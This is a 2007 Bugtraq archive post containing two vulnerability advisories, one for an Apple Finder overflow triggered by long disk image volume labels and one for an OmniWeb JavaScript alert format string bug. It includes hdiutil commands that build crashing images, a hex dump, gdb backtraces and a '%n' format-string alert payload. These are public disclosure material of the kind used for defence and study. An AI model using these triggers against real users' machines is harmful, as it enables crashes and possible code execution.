Bugtraq mailing list archives

DMA[2007-0107a] OmniWeb Javascript Alert Format String Vulnerabiity and DMA[2007-0109a] Apple Finder Disk Image Volume Label Overflow / DoS

From: "K F (lists)" <kf_lists () digitalmunition com>
Date: Wed, 10 Jan 2007 19:14:01 -0500

I've been subject to a few DoS attacks as of late so these did not quitemake it out. Enjoy the typos as usual. =P

-KF

DMA[2007-0109a] - 'Apple Finder Disk Image Volume Label Overflow / DoS'
Author: Kevin Finisterre
Vendor(s): http://www.apple.com
Product: '<= OSX 10.4 (?)'
References: 
http://www.digitalmunition.com/DMA[2007-0109a].txt
http://www.apple.com/macosx/features/finder/
http://projects.info-pull.com/moab/MOAB-09-01-2007.html

Description:
Your home on the Mac, Finder gives you lots of options for locating, displaying and organizing all your 
files and folders. From the power of Spotlight search technology to the flexibility of customizable item 
views, Mac OS X Finder truly shows your Mac at a glance.

You can really piss Finder off in several ways by passing long volume labels to various types of disk 
images. Here is the hex dump of an example label that can be used to trigger the issue. 

0009c00: 4c41 424c be42 0000 0000 0001 4594 86e1  LABL.B......E...
0009c10: 00ff 4141 4141 4141 4141 4141 4141 4141  ..AAAAAAAAAAAAAA
0009c20: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009c30: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009c40: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009c50: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009c60: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009c70: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009c80: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009c90: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009ca0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009cb0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009cc0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009cd0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009ce0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009cf0: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009d00: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
0009d10: 4100 0000 0000 0000 0000 0000 0000 0000  A...............

Creating the images is something fairly easy to do. 
$ hdiutil create -sectors 31337 -type SPARSE -fs HFS+ -volname `perl -e 'print "A" x 255'` -layout NONE test.sparseimage

$ hdiutil create test.dmg -size 01m -fs HFS+ -volname `perl -e 'print "A" x 255'` 

$ hdiutil create test.dmg -size 200k -fs UFS -volname `perl -e 'print "A" x 255'` 

Attach gdb to Finder and open any of the above .dmg files and you will see the following crash. 

(gdb) bt
#0  0xffff0ac4 in ___memcpy () at /System/Library/Frameworks/System.framework/PrivateHeaders/i386/cpu_capabilities.h:228
#1  0x90c93952 in _FSCopyExtendedAliasInfoFromAliasPtr ()
#2  0x9252939d in TNode::CreateVirtualAliasRecord ()
#3  0x92528872 in TNode::PopulateVirtualContainerFromSFL ()
#4  0x92513343 in TNodeSyncTask::SyncTaskProc ()
#5  0x90cb3f84 in PrivateMPEntryPoint ()
#6  0x90023d87 in _pthread_body ()

See Alastairs blog (http://alastairs-place.net) in about 3 days for an explaination of exploitability.

Workaround: 
Do not mount disk images or simply disable finder and use Spotlight instead. 

1. Open Terminal, found in /Applications -> Utilities, and then type 
   'sudo mv /System/Library/CoreServices/Finder.app /Applications/' 

2. Still in Terminal, type killall Finder -- this kills the process named Finder, and it should not restart! Note that 
this 
   does not affect the Dock or Expos

The following command will unmount a disk image in the event that your Finder has been put into a DoS condition. 
$ hdiutil unmount /Volumes/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/

DMA[2007-0107a] - 'OmniWeb Javascript Alert Format String Vulnerabiity'
Author: Kevin Finisterre
Vendor(s): http://www.omnigroup.com
Product: 'OmniWeb 5.51 (?)'
References: 
http://www.digitalmunition.com/DMA[2007-0107a].txt
http://www.omnigroup.com/applications/omniweb/
http://projects.info-pull.com/moab/MOAB-07-01-2007.html
http://www.omnigroup.com/applications/omniweb/download/
http://blog.omnigroup.com/2007/01/07/omniweb-552-now-available-and-more-secure/

Description:
You're a Mac fan, right? When people ask you why you like the Mac, you probably think of the attention to detail that 
makes the Mac user experience superior. It's the sum of a lot of different things that add up to a system that's more 
powerful, more beautiful, and more fun.

What if you thought of a web browser in the same way? You use a web browser all the time, for working, for 
entertainment, 
for research; how cool would it be if every time you used it, you thought "Wow, this rules!"

Welcome to OmniWeb. OmniWeb elevates your web user experience to be more productive, more efficient, and more fun. 
You'll 
find information more quickly. You'll stay organized. You'll see the entire internet the way you choose. It's the 
browser 
that puts you in control.

Sure, you can use a standard web browser, with standard features. But you didn't choose a standard software experience 
- 
you chose the Mac. Why not try a browser built just for discriminating people with fabulous taste, like yourself? 

The only real reason to not make use of such a fabulous browser would be bad code.

(gdb) r /Users/MacFan/Sites/test.html
Starting program: /Applications/OmniWeb.app/Contents/MacOS/OmniWeb /Users/MacFan/Sites/test.html
Reading symbols for shared libraries 
...................++..++.......................................................++++
++++.......++. done
OCCCrashCatcher: Not enabling crash catching since we're connected to a tty (and thus presumably in gdb)
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done
Reading symbols for shared libraries . done
Reading symbols for shared libraries .. done
Reading symbols for shared libraries ... done

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x005dec56
0x9000c0c1 in __vfprintf ()
(gdb) bt
#0  0x9000c0c1 in __vfprintf ()
#1  0x90100ea9 in snprintf_l ()
#2  0x908119d5 in _CFStringAppendFormatAndArgumentsAux ()
#3  0x9081091c in _CFStringCreateWithFormatAndArgumentsAux ()
#4  0x925daa5d in -[NSPlaceholderString initWithFormat:locale:arguments:] ()
#5  0x925fc670 in -[NSString initWithFormat:arguments:] ()
#6  0x9336056f in -[NSAlert buildAlertStyle:title:message:first:second:third:oldStyle:args:] ()
#7  0x934ac77a in _NXDoLocalRunAlertPanel ()
#8  0x934ac4cc in NSRunAlertPanel ()
#9  0x000b6a6e in -[OWTab(WebUIDelegate) webView:runJavaScriptAlertPanelWithMessage:] ()
#10 0x005ded54 in -[WebFrameBridge runJavaScriptAlertPanelWithMessage:] ()
(gdb) shell cat /Users/MacFan/Sites/test.html
<script>alert('%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n%n')</script>

Workaround:
Download the latest version of OmniWeb or see the MOAB Fixes Google group for a work around

Current thread:

DMA[2007-0107a] OmniWeb Javascript Alert Format String Vulnerabiity and DMA[2007-0109a] Apple Finder Disk Image Volume Label Overflow / DoS K F (lists) (Jan 11)